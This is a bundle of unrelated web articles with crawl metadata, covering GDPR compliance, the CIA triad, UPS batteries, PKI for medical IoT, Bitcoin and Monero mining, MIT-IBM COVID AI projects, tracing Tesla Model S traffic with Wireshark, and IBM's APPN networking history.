personal data. Article 33 details what a controller must do. This means organizations that transfer data to non-EU countries. The Data Protection Commission has deemed specific countries, territories, and sectors to have an adequate level of transfer, so they don't need specific authorization. Article 45 explains more about how the Commission decides an adequate transfer. As communication channels and data sharing multiply exponentially, news and guidelines about data processing and sharing will rapidly evolve. Confirming compliance with the GDPR may seem like a formidable task. Today, organizations must not only follow the original GDPR but also data privacy laws in different countries. That's why we at Ketch are dedicated to taking the agony out of ensuring your organization's GDPR compliance. The Ketch Data Permissioning Platform lets you set broad policies for how your organization handles data. You can tag every piece of personal data you collect with permits that say how you'll use the data. If developers want to know if it's permissible to share personal data, all they need is a simple query. They can continue their operations without worrying if processing certain data violates privacy laws. You can also perform regulation-specific risk assessments, privacy-protected data mapping, and much more. If you want help to ensure compliance with data regulations, request a demo. Read to learn the origin of the GDPR compliance meaning, the principles of data processing and data privacy, and how your organization can become compliant.
<urn:uuid:b68fa303-afa9-492e-b59e-0e5dc1f0327d>
CC-MAIN-2024-38
https://www.ketch.com/blog/posts/gdpr-compliance-meaning
2024-09-10T06:48:34Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651224.59/warc/CC-MAIN-20240910061537-20240910091537-00896.warc.gz
en
0.931796
1,315
3.390625
3
When you hear the acronym "CIA", you might think of secret agents and spy movies. But in the world of cybersecurity and compliance, there is another CIA that is very important: the CIA Triad. This stands for Confidentiality, Availability, and Integrity, and it is a security model that helps you protect your organization from digital threats and security breaches. This trio forms the backbone of a robust security model designed to fortify your organization's security infrastructure. In this article, we will discuss each of these components and explain how you can apply them as part of your ISO-27001 compliance journey. What is the CIA Triad? The CIA Triad is a fundamental concept in information security that outlines three core principles: Confidentiality, Integrity, and Availability. These principles serve as a framework for designing, implementing, and evaluating security policies, practices, services, and even products! In the CIA Triad confidentiality means ensuring that data is only accessible to specifically authorized individuals or systems. You must protect sensitive data from unauthorized access, disclosure, or alteration, whether done with malicious intent or by honest human error. The primary goal of confidentiality is to fortify all data by meticulously controlling and restricting access. Only individuals with an absolute necessity for the information are granted access, ensuring a stringent approach to user permissions. If there's no imperative need, data remains confidential, embodying a proactive stance in safeguarding information from unnecessary exposure or compromise. Integrity focuses on the accuracy and reliability of data. It ensures that information is not tampered with or altered by unauthorized entities. Maintaining data integrity is vital for ensuring the trustworthiness of information, as any unauthorized changes could lead to misinformation or compromised system functionality. Availability emphasizes the timely and reliable access to information and resources. It ensures that previously authorized users can access the required data or services when needed. Availability is essential to prevent disruptions in services and maintain the functionality of systems. The CIA Triad is intricately woven into the fabric of the ISO 27001 standard. ISO 27001 is a globally recognized compliance framework for establishing, implementing, maintaining, and continually improving an Information Security Management System (ISMS). Together, the CIA Triad and ISO 27001 create a comprehensive approach to information security, offering organizations a robust framework to safeguard their data against a diverse range of threats and vulnerabilities. Read our article on “What is ISO 27001?” and learn more about this framework and its connection to the CIA Triad. CIA Triad Examples and Use Cases Now that you have a foundational understanding of the CIA Triad's principles—Confidentiality, Integrity, and Availability—you may be eager to explore how these concepts manifest in day-to-day business operations and the specific policies and controls essential for upholding the triad's principles. Let’s look at some CIA triad examples to show you the practicality of these pillars. Confidentiality Controls and Use Case Remember, these controls aim to restrict access to sensitive information. Think of tools that verify a user's identity and filter or limit who and where the information can be accessed from (device type and location). Some of these controls are the following: - Data encryption - Data classification and labeling - Access Control - Multifactor Authentication (MFA) - Strong Password Policy and Management - Let's consider the healthcare sector to exemplify the use of a component of Access Control, RBAC (Role Based Access Control), as a method to guarantee confidentiality. A healthcare facility may have different administrative roles such as doctors, nurses, administrative staff, and billing specialists. With RBAC, each role can be assigned specific privileges. Doctors may have comprehensive access to patient medical histories, treatment plans, and test results to provide optimal care. Nurses might have access to patient records for administering medications and updating treatment progress. Administrative staff may handle patient scheduling and general record keeping, while billing specialists could access information related to insurance and financial transactions. This way all of them have access to the information they need to perform their job functions, without unnecessarily risking the patient’s data privacy and confidentiality. Integrity Controls and Use Case Integrity is all about keeping data updated and accurate. You should focus on having ways to visualize any changes and verify they are legitimate. If the information is inaccurate, that means there’s likely been a security breach. These are some of the controls for Integrity: - Consider an e-commerce company that handles a significant number of daily online transactions, including customer purchases, order fulfillment, and payment processing. By implementing robust logging and auditing systems, the e-commerce company can maintain a detailed record of each transaction. This record includes essential information such as the timestamp, user details, and specifics of the purchase. If there is a modification in the order status or a change in payment details, the logging system captures these alterations. In the case of any discrepancies or suspected security breaches, the company can refer to these logs to investigate and verify the legitimacy of changes. This not only enhances the organization's security, but also contributes to a positive user experience. Imagine being a customer who places an important order, only to have it canceled due to a security breach. If a cybercriminal gained access to the system and manipulated account details, resulting in the loss or transfer of funds, it would be incredibly frustrating. The detailed logs serve as a crucial tool for addressing such situations promptly and effectively, safeguarding both the company and the customer. Availability Controls and Use Case Availability controls focus on ensuring timely and reliable access to information and resources. Businesses implement redundancy strategies, backup systems, and disaster recovery plans to minimize downtime and guarantee continuous service. These are a few other availability controls: - Firewalls and Proxy Servers - Redundancy Strategies - Backup Systems - Disaster Recovery Plans - High Availability (HA) Clusters - Incident Response Plans - Imagine a financial institution, such as a bank, that heavily relies on digital channels for customer transactions and services. One of the servers hosting the online banking platform experiences a sudden software failure. In this case, redundancy strategies redirect user requests to backup servers, ensuring continuous availability of online banking services. Now that you’ve gained insights into the CIA Triad and know why it forms the bedrock of a resilient security model. Don't leave your organization vulnerable to threats—understand and implement confidentiality, integrity, and availability controls effectively. If you’re ready to take the next step towards ISO 27001 compliance, book a meeting with our experts for personalized guidance on securing your information assets. Top 10 Posts Windows 10 Pro vs Enterprise Migrate From Gmail to Office 365: 2024 Guide Windows 10 Enterprise E3 vs E5: What's the Difference? What are the 4 types of Microsoft Active Directory? Office 365 MFA Setup: Step-by-Step Instructions Top 3 Reasons to Move From Google Drive to Microsoft OneDrive How to Migrate from GoDaddy to Office 365 How to Set Up Office 365 Advanced Threat Protection Google Workspace to Office 365 Migration: A Step-by-Step Guide How to Set Up Office Message Encryption (OME)
<urn:uuid:feff925a-3fb5-4ce1-b558-64855e2f0e1e>
CC-MAIN-2024-38
https://www.bemopro.com/cybersecurity-blog/what-is-the-cia-triad
2024-09-11T14:25:54Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651387.63/warc/CC-MAIN-20240911120037-20240911150037-00796.warc.gz
en
0.902511
1,482
2.8125
3
Powering Through Outages: The Vital Role of UPS Batteries in Data Centers In the digital age, where data is the currency of business operations, downtime is not an option. Data centers, the nerve centers of modern organizations, must maintain uninterrupted operations to ensure the seamless flow of information. Enter Uninterruptible Power Supply (UPS) batteries—the unsung heroes that play a pivotal role in safeguarding data centers against power disruptions. In this blog, we delve into the critical role of UPS batteries in data centers and explore how they enable businesses to power through outages with confidence. The Data Center Dilemma Data centers host an intricate ecosystem of servers, storage systems, networking equipment, and more. This bustling digital hub requires a constant and reliable power source to ensure that applications, services, and communications remain uninterrupted. Any power disruption, whether it’s a momentary glitch or a prolonged outage, can lead to financial losses, operational inefficiencies, and reputational damage. Enter the UPS Battery A UPS system acts as a bridge between the primary power source (usually the electrical grid) and the critical IT equipment in a data center. While the primary role of a UPS system is to provide a seamless transition from grid power to backup power during outages, it’s the UPS battery that serves as the lifeblood of this operation. Instantaneous Power Transition When grid power is lost, a UPS battery springs into action instantly, ensuring that critical equipment receives an uninterrupted power supply. This instantaneous transition prevents data loss, application disruptions, and potential hardware damage that can occur due to sudden power fluctuations. Safeguarding Sensitive Electronics Modern data center equipment is highly sensitive to power quality. Fluctuations, surges, and dips in voltage can wreak havoc on servers, storage, and networking gear. UPS batteries provide a stable power source, shielding sensitive electronics from potential harm and maintaining optimal performance. Time to Mitigate Generator Start-Up Delays In larger data centers, backup generators are often employed to provide extended power during lengthy outages. However, these generators take time to start up and reach operational capacity. UPS batteries bridge this gap, offering a seamless transition until the generators come online, thus preventing any disruption to operations. Buy Time for Proper Shutdowns In the event of an extended outage, UPS batteries offer valuable time for data center operators to initiate controlled shutdowns of non-essential equipment. This controlled process prevents abrupt shutdowns that can damage hardware or result in data corruption. Protecting Data Integrity Data centers are the repositories of critical information, and sudden power losses can lead to data corruption and loss. UPS batteries ensure that servers have enough power to complete ongoing processes, write cached data to storage systems, and initiate graceful shutdowns, preserving data integrity. Many data centers operate with redundant systems to ensure high availability. UPS batteries add an additional layer of redundancy, ensuring that even if one power source fails, the data center remains operational without any hiccups. In the high-stakes world of data centers, UPS batteries are the unsung champions of reliability, stability, and data protection. Their role in powering through outages goes beyond providing backup energy; they are the ultimate insurance against downtime, enabling data centers to uphold their promise of constant availability. As businesses continue to rely on data-driven operations, investing in robust UPS systems and reliable UPS batteries becomes not just a wise choice, but an indispensable necessity for maintaining business continuity and safeguarding critical digital assets.
<urn:uuid:7f5df833-79be-4b3e-845b-b6af76c4b904>
CC-MAIN-2024-38
https://www.netlabindia.com/blogs/powering-through-outages-the-vital-role-of-ups-batteries-in-data-centers/
2024-09-11T13:10:42Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651387.63/warc/CC-MAIN-20240911120037-20240911150037-00796.warc.gz
en
0.908163
716
2.8125
3
The recent coronavirus pandemic surfaced the need for quality remote healthcare services. Driven by social distancing measures, doctors had to provide medical services to their remote patients without impacting the quality and accuracy of their diagnosis. The proliferation of connected devices in the healthcare industry allowed this connectivity to materialize. Despite the many benefits, improper or weak management of these devices creates an expanding threat landscape that needs to be addressed sooner than later to avoid damaging data breaches of attacks against the healthcare institutions. The Connected Healthcare Landscape Distance between patient and doctor has been a barrier to the provision of quality healthcare services. Even in today’s hyper connected world, isolated communities are lacking access to competent connected healthcare. The proliferation of connected healthcare devices is promising to put an end to this inequality. There are many types of wearable healthcare devices that are currently in use, including: - Diagnostic and monitoring devices, such as cardiovascular and glucose monitoring devices - Therapeutic devices, like respiratory or insulin management devices - Rehabilitation devices, such as body motion devices - Lifestyle and fitness trackers Collecting real-time patient data and analytics is revolutionizing the way doctors can monitor and provide their services. Mobile Health (mHealth) and the proliferation of smartphones, apps, and IoT technology have had disruptive impacts on the world of connected health. Mobile, connected healthcare brings enormous benefits for both the doctors and the patients. Doctors and hospitals can ensure that their patients are taking medications at the prescribed time and amount. Connecting practitioners to their patients remotely can be life-saving – the speed at which a doctor can get to a patient in distress is saving lives. Finally, these technologies remove unnecessary paperwork and bureaucracy, leading in cutting costs and waste for doctor’s offices and hospitals. Threat Landscape is Expanding Besides the obvious clinical benefits, the proliferation of medical connected devices in healthcare brings security risks. The volume of healthcare data being transferred and stored every day can be measured in tera bytes — data from IoT and connected medical devices, electronic health records (EHRs), and applications for patients, clinicians, and researchers. The variety of these connected devices introduces novel cybersecurity challenges related to HIPAA compliance and overall information security. According to a recent study, 63% of healthcare organizations experienced a security incident related to unmanaged and IoT devices in the past two years. - Infusion and insulin pumps are vulnerable because of their connectivity capabilities, and NIST has published guidance to secure wireless infusion pumps in healthcare organizations. - Researchers discovered a simple denial-of-service attack against pacemakers that has the potential to kill. - Wearable devices transmitting heart rate, blood sugar, and other vitals via Bluetooth can be exposed to cyber-attacks. - Thermometers used for measuring the employee temperature as a precautionary measure to COVID-19 can also be hacked exposing sensitive data. PKI Can Secure Connected Medical Devices To protect patient data and secure healthcare organizations against cyber-attacks, these entities need to develop a robust security strategy that is based on the ability to effectively identify all connected devices. Identity authentication is the most effective way to reduce risks associated with exchanging information between medical devices. This is where Public Key Infrastructure (PKI) comes in handy. PKI is a well-established solution that provides encryption and authentication to any type of connected device and offers numerous advantages. PKI enables identity assurance while digital certificates validate the identity of the connected device. With PKI, IoT devices can be authenticated across systems. A robust PKI, where certificate lifecycle management follows well-established policies and practices, is not vulnerable to common brute force or man-in-the-middle attacks targeting the precious medical data. At the same time, PKI encrypts sensitive information while in transit, protecting it from malicious actors even in the event of a data breach or compromise. As such, PKI enforces HIPAA compliance. The HIPAA Security Rule dictates that healthcare entities must implement safeguards, such as encryption, that renders electronic Protected Health Information (ePHI) “unreadable, undecipherable or unusable” so any “acquired healthcare or payment information is of no use to an unauthorized third party.” In addition to meeting HIPAA compliance, PKI is scalable enough to secure heterogeneous connected medical device environments, which vary in size, complexity, and security needs. Certificate Lifecycle Management is Critical As we have noted before, connected devices authentication and encryption is based on an effective certificate lifecycle management program. With connected devices exploding, the associated digital identities explode in numbers as well. Healthcare organizations need to able to manage these identities effectively and efficiently to ensure that the corresponding certificates do not expire causing damaging outages. Digital certificates ensure the integrity of healthcare data and device communications through encryption and authentication, ensuring that transmitted data are genuine and have not been altered or tampered with. This is essential since, according to a recent report, 73% of healthcare organizations experience unplanned downtime and outages due to mismanaged digital certificates and public key infrastructure. As a result of poor certificate management practices, 55% of surveyed organizations have experienced four or more certificate-related outages in the past two years alone. The main reason for the weak certificate management is the lack of visibility. 74% of healthcare organizations do not know how many keys and certificates they have, where to find them or when they expire. How AppViewX Platform Helps With the proliferation of connected medical devices and their digital identities, it is important to understand that manual discovery of keys and certificates is no longer an option. Manual certificate management is an erroneous and time-consuming process which creates a false sense of security, leaving healthcare organizations open to vulnerabilities and devastating cyber-attacks. It is essential that organizations automate and centralize their PKI to minimize the risk of certificate related outages and data breaches. The AppViewX platform helps organizations reinforce their IoT PKI strategies. It helps manage and automate every step of the implementation cycle – from multi-vendor certificate enrolment, to revocation, monitoring, and end device provisioning. It’s all your organization needs to stay secure and compliant, while scaling upward and enforcing cryptography across the network. You can either request a demo or contact our experts to learn more.
<urn:uuid:2e2d5234-4ade-4389-8cea-0c83e1b26ff8>
CC-MAIN-2024-38
https://www.appviewx.com/blogs/why-encryption-is-critical-to-the-healthcare-industry/
2024-09-14T02:00:13Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651540.77/warc/CC-MAIN-20240913233654-20240914023654-00596.warc.gz
en
0.940955
1,293
2.671875
3
Ever wondered why websites that are mining in the background don’t mine for the immensely hot Bitcoin, but for Monero instead? We can explain that. As there are different types of cryptocurrencies, there are also different types of mining. After providing you with some background information about blockchain , and cryptocurrency, we’ll explain how the mining aspect of Bitcoin works. And how others differ. Cryptocurrency miners are in a race to solve a mathematical puzzle, and the first one to solve it (and get it approved by the nodes) gets the reward. This method of mining is called the Proof-of-Work method. But what exactly is this mathematical puzzle? And what does the Proof-of-Work method involve? To explain this, we need to show you which stages are involved in the mining process: - Verify if transactions are valid. Transactions contain the following information: source, amount, destination, and signature. - Bundle the valid transactions in a block. - Get the hash that was assigned to the previous block. - Solve the Proof-of-Work problem (see below for details). The Proof-of-Work problem is as follows: the miners look for a SHA 256 hash that has to match a certain format (target value). The hash will be based on: - The block number they are currently mining. - The content of the block, which in Bitcoin is the set of valid transactions that were not in any of the former blocks. - The hash of the previous block. - The nonce, which is the variable part of the puzzle. The miners try different nonces to find one that results in a hash under the target value. So, based on the information gathered and provided, the miners race against each other to try and find a nonce that results in a hash that matches the prescribed format. The target value is designed so that the estimated time for someone to mine a block successfully is around 10 minutes (at the moment). If you look at BlockExplorer.com, for example, you will notice that every BlockHash is 256 hexadecimal digits long and starts with 18 zeroes. For example the BlockHash for Block #497542 equals 00000000000000000088cece59872a04457d0b613fe1d119d9467062e57987f1. At the time of writing, this is the target—the value of the hash has to be so low that the first 18 digits are zeroes. So, basically, miners have some fixed input and start trying different nonces (which must be an integer), and then calculate whether the resulting hash is under the target value. Therefore we call Bitcoin “pseudononymous.” This means you may or may not know the name of that person, but you can track every payment to and from his address if you want. There are ways to obfuscate your traffic, but they are difficult, costly, and time-consuming. Monero however, has always-on privacy features applied to its transactions. When someone sends you Monero, you can’t tell who sent it to you. And when you send Monero to someone else, the recipient won’t know it was you unless you tell them. And because you don’t know their wallet address and you can’t backtrack their transactions, you can’t find out how “rich” they are. Transactions inside a Bitcoin block are an open book. Monero mining does not depend on heavily specialized, application-specific integrated circuits (ASICs), but can be done with any CPU or GPU. Without ASICs, it is almost pointless for an ordinary computer to participate in the mining process for Bitcoin. The Monero mining algorithm does not favor ASICs, because it was designed to attract more “little” nodes rather than rely on a few farms and mining pools. There are more differences that lend themselves to Monero’s popularity among behind-the-scenes miners, like the adaptable block size, which means your transactions do not have to wait until they fit into a later block. The Bitcoin main-stream blockchain has a 1 MB block cap, where Monero blocks do not have a size limit. So Bitcoin transactions will sometimes have to wait longer, especially when the transaction fees are low. The advantages of Monero over Bitcoin for threat actors or website owners are mainly that: - It’s untraceable. - It can make faster transactions (especially when they are small). - It can use “normal” computers effectively for mining For those of you looking for more information on the technical aspects of this subject, we recommend:
<urn:uuid:3ebaf6a4-06b5-4375-aaf9-e3b413a6bdc6>
CC-MAIN-2024-38
https://www.malwarebytes.com/blog/news/2017/12/how-cryptocurrency-mining-works-bitcoin-vs-monero
2024-09-13T23:53:11Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651540.77/warc/CC-MAIN-20240913233654-20240914023654-00596.warc.gz
en
0.939583
979
2.765625
3
From risk assessment to finding a cure for chronic diseases, Artificial intelligence is helping the healthcare industry to gain deeper insights into treatment variability, care processes, diagnostics, and patient outcomes. Considering the huge potentiality of AI and machine learning (ML) in the care quantum, healthcare researchers have, from time to time, funded various projects that transformed the healthcare ecosystem. Currently, as the world is amidst a life-threatening and rapidly spreading pandemic, the MIT-IBM Watson AI Lab has come forward to fund some ten highly-potential AI projects that aim to combat the economic and health consequences caused due to COVID-19. Here is a list of those ten AI projects: Project 1: Early detection of Sepsis in Covid-19 Patients During the ongoing pandemic, 10% of COVID-19 patients have been diagnosed with sepsis within a week of showing symptoms, and only half of them could survive through it. If sepsis can be identified early and the patient is put on intensive care at the hospital, the chance of survival may increase. That is why MIT Professor Daniela Rus leading a project along with other researchers to leverage artificial intelligence (AI) in developing a machine learning system that will analyze patients’ white blood cell images to detect signs of an activated immune response. Project 2: Designing Proteins to Block SARS-CoV-2 In an effort to defeat Coronavirus, MIT professors Benedetto Marelli and Markus Buehler are leading a project that uses a protein-folding method to block the Coronavirus from binding to the host’s cell. The method they are using is similar to what they earlier used in the lab to discover the silk protein made by honeybees that they found to double the life shell of perishable foods. Project 3: Saving Lives as the U.S. economy Restarts Even though Coronavirus is still there, businesses in some states in the U.S. are reopening. Therefore, to limit further spread of COVID-19 amidst the economic restart, MIT professors Simon Johnson, Daron Acemoglu, and Asu Ozdaglar are leading a project where they are using artificial intelligence models to analyze and study variable lockdown strategies and their possible impact on public health and the economy. Project 4: Determining Which Material Is Effective in Protecting Mask Wearers While wearing a face mask is mandatory to prevent Coronavirus’s spread, there is no standardized method for the evaluation of many masks. Apart from N95 masks, there are a variety of masks available in the market, but no mechanism is at work to evaluate them. That is why researchers of a project led by Lydia Bourouiba, an MIT Associate Professor, are developing a precise set of methods to evaluate homemade and medical-grade masks’ effectiveness in blocking saliva droplets of mucus released during sneezing, coughing, and breathing. Project 5: Use of Repurposed Drugs to Treat Covid-19 The project aims to find a cure from the list of already approved drugs is led by Rafael Gomez-Bombarelli, an MIT Assistant Professor and his team of researchers. They are trying to represent molecules in three dimensions to extract spatial information that can be used to identify effective drugs in combating coronavirus. As part of their project, they will use the U.S. Department of Energy’s NSERC and NASA’s Ames supercomputers to expedite the screening process using machine learning. Project 6: Use of Automated Contact Tracing COVID-19 is spreading like wildfire, and limiting the spread is essential. For this, the healthcare department needs to trace people who might have contacted the coronavirus infected patients. That is why MIT researchers Ronald Rivest and Daniel Weitzner, in collaboration with MIT Lincoln Laboratory and others, are working towards using encrypted Bluetooth data to trace contacts, keeping identifiable information safe and secure. Project 7: Ensuring Global Access to Coronavirus Vaccine We all are aware that only a vaccine can help fight COVID-19. However, what remains a challenge is the equal and rapid distribution of vaccines globally. Addressing the possible manufacturing and supply challenges, MIT professors Anthony Sinskey and Stacy Springs are leading a project with other researchers that aim to build data-driven statistical models to make informed decisions and make the vaccine accessible to the world in a cost-effective way. Project 8: Leveraging Electronic Medical Records (EMR) to Find COVID-19 Cure Already in the US, the anti-viral drug remdesivir that was developed for Ebola treatment is being clinically tested to check its potentiality in COVID treatment. Following a similar strategy, MIT professors Roy Welsch and Stan Finkelstein are using ML, statistics, and simulated clinical trials to analyze millions of EHR data to see if any of the already-approved drugs can be reused against COVID-19. Project 9: Finding better ways to treat Covid-19 patients on ventilators As COVID patient count increases, there is a shortage of mechanical ventilators. Together with IBM researchers Daby Sow and Zach Shahn, MIT researchers Li-Wei Lehman and Roger Mark are using AI and COVID patient data from a local Boston hospital and data of intensive-care patients with acute respiratory distress syndrome. They will develop a tool to help doctors identify the right ventilator settings for infected patients and determine the right duration for which patients should be kept on the machine. In this way, they hope to limit lung damage caused to the patient in the absence of a machine. Project 10: Bringing the World Back to Normal with Targeted lockdowns, Personalized treatments, and Mass Testing In the first phase of a project led by Dimitris Bertsimas, an MIT Professor, and his group of researchers plan to study the impact of lockdowns and other government measures formulated to prevent new infection cases and deaths. Going ahead in the second phase, they will build ML models to predict the vulnerability of patients to COVID-19 and what kind of personalized treatment will prove effective for them. Also, they plan to develop a spectroscopy-based test for COVID-19 that will be inexpensive as well as deliver the result in minutes. For the project, data will be fetched from four hospitals in Europe and the US.
<urn:uuid:d320b83a-5d92-4faa-9438-8084b4c6c982>
CC-MAIN-2024-38
https://www.mytechmag.com/10-mit-ibm-watson-ai-lab-funded-projects-to-fight-against-covid-19/
2024-09-15T07:57:54Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651616.56/warc/CC-MAIN-20240915052902-20240915082902-00496.warc.gz
en
0.928056
1,321
3.078125
3
IoT: Tesla Model S Remote Control (by Jonathan Whiteside, Darrin Roach and Paul Offord) With the proliferation and expansion of wireless technologies, it is now becoming commonplace for vehicles to be connected to the Internet for numerous reasons, such as website access, telematics and always connected emergency services. Tesla Motors is very much at the forefront of the ‘Connected Vehicle’ revolution, producing vehicles with ‘always on’ connectivity through 4G LTE and WiFi. This gives the driver features such as Google Maps navigation, web access and Spotify. It also allows remote operation features such as climate control and charge port opening/closing, as well as providing an instant view of battery charge levels. All these features can be readily accessed from a mobile phone app or desktop app on a PC. The objective of this experiment was to learn more about connected vehicle technology by tracing the data flows between a desktop PC app called Tesla Control (shown above), the Tesla Cloud Services and a Tesla Model S. We also feel that a basic knowledge of the vehicles connectivity may help others troubleshoot problems. We wanted to determine if it was possible to trace some of the control features in action, using equipment and hardware that was easily available; in other words, using no specialised equipment. The following diagram shows how the components of the test were logically connected: Tracing interactions between the Tesla Control app and the Tesla Cloud services is easily achieved using Wireshark. Tracing interactions between the Tesla Cloud Services and the vehicle is trickier. On the road, a Tesla vehicle is constantly connected to the Internet and Tesla Cloud Services via a 4G LTE data connection, and we had no way to trace this connection. The Tesla vehicle has an option to connect to the Internet via WiFi, rather than use 4G LTE, and this provided a way for us to trace the vehicle-cloud interactions. A further problem was that our office is on the third floor of a glass and steel building with silvered windows. Despite parking the Model S in various bays in the office car park, it was not possible to obtain a consistently good WiFi signal from the vehicle to our office Access Point. To overcome this, we set about designing a potable solution that we could use in the office car park, or from within the vehicle itself. Standard off the shelf items were used for these tests, with no enhancements, and some minor configuration changes made to ensure the intended operation. A 2017 Tesla Model S was available for testing. The equipment/software used was as follows: Dell XPS 15 9560 Laptop with Windows 10. Dell DA200 USB-C to HDMI/VGA/Ethernet/USB 3.0 adapter. TP-Link TL-WR702N. (Chosen as it can be powered easily from a USB port) Samsung Galaxy S7. Tesla Control (from Microsoft Store, owner’s permission and credentials were provided). Note, this is the equipment that we had to hand, and it should be possible to replicate the tests with any similar equipment. The equipment was configured as follows: A WiFi hotspot was configured on the phone. This provided Internet and DHCP services. The laptop WiFi was connected to the WiFi hotspot of the phone. The laptop WiFi connection was configured to share its internet connection with the Ethernet connection of the DA200. The TP-Link TL-WR702N was connected to the Ethernet port of the DA200 and powered from the DA200’s USB port. DHCP was disabled on the TP-Link TL-WR702N, since the phone would automatically provide this. The vehicle was connected to the TP-Link TL-WR702N using WiFi. All equipment was battery powered or powered from USB connections for maximum portability. The following image shows the actual configuration of the laptop and other components used for our tests: In this configuration the laptop performed two roles: As a host for the Tesla Control app that communicated with the Tesla Cloud Service. As a router for traffic flowing from the Tesla Cloud Service to the vehicle. The flow of data was: A command from Tesla Control app flows from the laptop via the Samsung Galaxy S7 and Internet, to the Tesla Cloud Service. A matching command would flow from the cloud service, through the Internet, through the Samsung Galaxy S7, through the laptop, through the TP-Link unit and to the vehicle. Responses would flow in the reverse direction across the same two paths. This configuration closely matched the logical configuration, using WiFi rather than LTE, and allowed us to capture app to cloud packets and cloud to car packets on the single laptop using Wireshark. The trace configuration was: Capture on the laptop WiFi interface to trace the Tesla Control app to cloud service flows. Capture on the USB Ethernet interface to trace the Tesla Cloud Service to vehicle flows. Two separate instances of Wireshark were used for capture; one instance for each interface. Get the full paper, which details the test method and findings, from https://community.tribelab.com/mod/resource/view.php?id=722. The paper is freely available to community members - just login and click the link. If you are not a TribeLab member, sign up here - it only takes seconds and is totally free.
<urn:uuid:178ca0d4-4190-4f4c-91cf-8202be29bc07>
CC-MAIN-2024-38
https://www.networkdatapedia.com/post/2018/12/16/iot-tesla-model-s-remote-control-by-jonathan-whiteside-darrin-roach-and-paul-offord
2024-09-17T19:11:44Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651829.57/warc/CC-MAIN-20240917172631-20240917202631-00296.warc.gz
en
0.946864
1,121
2.734375
3
In the annals of networking, IBM’s Advanced Peer-to-Peer Networking (APPN) stands as a monumental shift in the design and implementation of network architectures. Emerging as the successor to the Systems Network Architecture (SNA), APPN revolutionized how network resources could be utilized and managed. It broke away from the centralized, hierarchical model of its predecessor, offering instead a more flexible, dynamic, and scalable solution. As with many technologies, time and innovation have rendered APPN less prominent, but its impact on the networking landscape is indelible. In this article, we will explore the genesis, core principles, and mechanics of APPN, trace its evolution over time, and evaluate its legacy in today’s networking paradigms. - Introduction to Advanced Peer-to-Peer Networking (APPN) - Core Principles of APPN - Technical Details of APPN - Evolution and Adaptations of APPN - The Decline and Legacy of APPN - Conclusion: APPN in Retrospect 1. Introduction to Advanced Peer-to-Peer Networking (APPN) Advanced Peer-to-Peer Networking, commonly abbreviated as APPN, is a networking architecture developed by IBM as an extension and successor to their Systems Network Architecture (SNA). APPN was designed to address some of the limitations of SNA, notably its rigid, hierarchical design, and reliance on centrally managed resources. The primary objective of APPN was to enable more efficient, flexible networking by leveraging dynamic routing and decentralized control. Departure from SNA In contrast to SNA’s hierarchical model, APPN adopted a peer-to-peer approach. This marked a significant departure in how network nodes interacted with each other. Rather than funneling all communications through a central hub, as was common in SNA, APPN allowed for more direct, node-to-node communication. This not only improved network efficiency but also offered better scalability and adaptability, as nodes could join or leave the network with minimal disruption to network operations. 2. Core Principles of APPN One of the most significant advancements brought about by APPN was its use of dynamic routing. Unlike SNA, which used static routes defined by network administrators, APPN allowed network nodes to discover the most efficient paths for data transmission dynamically. This was accomplished through sophisticated routing algorithms that continually assessed the network state, making real-time adjustments as needed. APPN further distinguished itself from its predecessor through its decentralized control mechanism. In SNA, a central controller—often a mainframe—managed resource allocation and routing decisions. APPN, on the other hand, distributed these responsibilities across multiple nodes in the network. This made the network more resilient to single points of failure and also allowed for more granular control over network resources. Through these core principles, APPN made significant strides over SNA, addressing many of the limitations that had constrained earlier networking architectures. The shift towards dynamic routing and decentralized control not only improved the efficiency and reliability of network operations but also laid the groundwork for future advancements in networking technology. 3. Technical Details of APPN APPN operates over a layered architecture, closely aligning with the OSI model. The architecture incorporates application, presentation, session, transport, network, data link, and physical layers. Each layer has its own set of responsibilities, from managing data flow and routing information to handling error detection and recovery. The integration of these layers provided a modular and flexible framework, making it easier to adapt APPN to various hardware and software configurations. APPN supported multiple types of network topologies, including ring, star, and mesh configurations. However, what set it apart was its ability to adapt to changing topological structures dynamically. Nodes could join or leave, and the network would automatically update its routing tables. This adaptive feature reduced the administrative burden and allowed for seamless network expansion or contraction, further promoting scalability and adaptability. 4. Evolution and Adaptations of APPN Integration with Other Technologies As networking technologies continued to evolve, so did APPN. It saw a degree of integration with other networking protocols and standards, including TCP/IP. Such interoperability allowed APPN to remain relevant as networking trends shifted, extending its lifespan and utility. Evolution into APPN/EP (End Node) The APPN architecture also evolved into what is known as APPN/EP (End Node). This variation was optimized for end-user devices and systems that did not require the full routing capabilities of a network node but still needed to participate in the APPN network. APPN/EP allowed these end nodes to communicate with APPN network nodes, providing a more inclusive and extended network infrastructure. By continually adapting and integrating with other technologies, APPN managed to stay relevant longer than many of its contemporaries. These evolutionary steps, however, were not enough to prevent its decline, which was mainly precipitated by the rise of more modern and flexible networking paradigms like IP networking. 5. The Decline and Legacy of APPN The Rise of IP Networking The decline of APPN can largely be attributed to the ascendancy of IP-based networking, particularly the ubiquitous adoption of TCP/IP. The IP protocol suite offered similar advantages in terms of flexibility, scalability, and dynamic routing but also came with the benefit of being vendor-neutral. As organizations moved towards more open and standardized network architectures, APPN’s proprietary nature became a significant drawback. Lessons Learned and Lasting Impacts Despite its decline, APPN’s contributions to networking should not be understated. It introduced many concepts—like dynamic routing and decentralized control—that have become standard features in modern network architectures. Furthermore, its attempt at seamless integration with other technologies provides an early example of the benefits of interoperability. 6. Conclusion: APPN in Retrospect A Summary of its Significance APPN emerged at a time when networking was transitioning from rigid, hierarchical models to more flexible, peer-to-peer architectures. It pushed the envelope on what was possible, serving as a stepping stone for future advancements. How it Fits in the Larger Networking Narrative In the grand tapestry of networking history, APPN serves as a significant chapter. It encapsulates the industry’s broader move towards decentralization and dynamic control, themes that continue to resonate in modern network design. While APPN may no longer be at the forefront of networking technologies, its legacy endures in the principles and features that have become integral to contemporary networking solutions. - “Networking Systems: Design and Development” by Lee Chao - “IBM’s Systems Network Architecture: A Historical Perspective” by John Naugle - RFC 1795: Data Link Switching: Switch-to-Switch Protocol - RFC 2353: APPN Implementer’s Workshop Closed Pages Document This wraps up our 